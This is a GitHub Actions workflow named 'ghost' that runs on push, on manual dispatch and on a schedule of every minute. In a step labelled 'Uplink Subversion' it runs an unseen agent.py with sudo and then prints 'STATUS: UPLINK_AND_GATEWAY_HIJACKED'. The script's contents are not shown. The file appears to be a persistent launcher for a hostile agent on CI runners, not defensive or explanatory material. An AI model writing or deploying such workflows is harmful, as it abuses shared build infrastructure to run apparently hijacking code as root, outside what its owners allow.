name: ghost
on:
  push:
  workflow_dispatch:
  schedule:
    - cron: '* * * * *'
jobs:
  execute:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Uplink Subversion
        run: |
          sudo python3 .github/workflows/agent.py
          echo "STATUS: UPLINK_AND_GATEWAY_HIJACKED"
